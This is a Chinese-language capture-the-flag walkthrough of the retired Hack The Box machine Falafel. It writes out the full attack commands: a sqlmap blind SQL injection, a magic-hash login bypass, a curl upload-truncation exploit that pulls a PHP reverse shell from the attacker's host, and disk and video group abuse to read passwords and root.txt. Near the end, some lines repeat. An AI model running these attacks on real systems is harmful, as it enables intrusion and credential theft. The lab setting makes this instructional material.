本篇文章仅用于技术交流学习和研究的目的,严禁使用文章中的技术用于非法目的和破坏,否则造成一切后果与发表本文章的作者无关
靶机是作者购买VIP使用退役靶机操作,显示IP地址为10.10.10.73
本次使用https://github.com/Tib3rius/AutoRecon 进行自动化全方位扫描
执行命令 autorecon 10.10.10.73 -o ./Falafel-autorecon
就开了22和80端口,访问web应用
点击了下页面的功能发现个登录界面,试了几个弱口令都不正确,但是发现尝试用户admin的时候显示如下:
尝试非admin用户显示如下:
猜测这里可能存在布尔型盲注,通过测试确认存在,下面给出最终sqlmap跑的命令
sqlmap进行布尔型盲注 sqlmap -r login.req --level 5 --risk 3 --string "Wrong identification" -D falafel -T users -C username,password --dump --batch login.req内容 POST /login.php HTTP/1.1 Host: 10.10.10.73 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate DNT: 1 Referer: http://10.10.10.73/login.php Cookie: PHPSESSID=um2i05ekvo5fvm52clvh5ve840 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 27 username=admin&password=bmfx
sqlmap倒是自动跑出来了用户chris的密码,但是admin的密码并没有成功的跑出来,试了下chris的密码成功登录,但是没啥用处,我们还是得找出admin用户的密码
用户admin的hash值0e462096931906507119562988736854 经过谷歌搜索和测试,发现带0e开头的hash是一种关于magic-hashes,详细链接参考:https://www.whitehatsec.com/blog/magic-hashes/
所以根据上述就知道了admin账户的密码为240610708 使用此密码登录进去之后发现一个上传页面,上传非图片格式会出现下面的形式
经过测试只能使用长文件名称上传,且需要实现在本地kali上生成好此类文件,写入php的反弹shell代码,文件格式需要类似于....php.png之类的后缀才可以,具体操作如下:
事先准备好的反弹代码名称
使用python搭建好本地简易web应用
URL=$(python -c 'print "http://10.10.14.5:8000/" + "A"*232 + ".php.png"'); curl -i -s -k -X $'POST' -H $'Referer: http://10.10.10.73/upload.php' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Cookie: PHPSESSID=um2i05ekvo5fvm52clvh5ve840' --data-binary "url=$URL" $'http://10.10.10.73/upload.php' | grep -e "The name is too long" -e shorten -e "New name" -e CMD
执行上面的curl命令即可成功写入反弹shell,然后本地监听端口,访问反弹shell代码即可
成功拿到shell之后在网站根目录翻看了下发现了数据库连接配置文件,找了如下信息:
使用上面的账户和密码切换至用户moshe试试
到了这里执行命令w发现存在用户yossi是在登录的状态查看当前组信息,并列出所有组信息
for x in $(groups); do echo ========${x}========; find / -group ${x} ! -type d -exec ls -la {} ; 2>/dev/null > ${x}; done
找到了一张带密码的截图,具体如下
将文件screenshot.raw复制到本地kali,然后使用gimp打开调试一下即可发现账户和密码的截图(类型选择RGB565 Big Endian)
得到了另一个用户和密码信息:yossi:MoshePlzStopHackingMe! 通过ssh远程登录
总结一下,这里主要就是发现用户yossi是一直在登录的状态,然后通过设备信息,获取截图内容,找到了用户的密码
此处仍然使用同样的方法通过读取磁盘设备信息获取root.txt,所以可通过下面两种方式获取
cat /dev/sda5 | strings -a | grep "root.txt" | grep -e "[0-9a-f]{32}" echo "23b79200448c62ffd6f8f2xxxxxxxxxx" > root.txt printf "23b79200448c62ffd6f8f2xxxxxxxxxx" > root.txt echo "23b79200448c62ffd6f8f2xxxxxxxxxx" > root.txt echo "23b79200448c62ffd6f8f2xxxxxxxxxx" > root.txt printf "23b79200448c62ffd6f8f2xxxxxxxxxx" > root.txt echo "23b79200448c62ffd6f8f2xxxxxxxxxx" > root.txt yossi@falafel:/dev/shm/.d$ debugfs /dev/sda1 debugfs 1.42.13 (17-May-2015) debugfs: ls /root debugfs: cat /root/root.txt 23b79200448c62ffd6f8f20xxxxxxx debugfs: quit
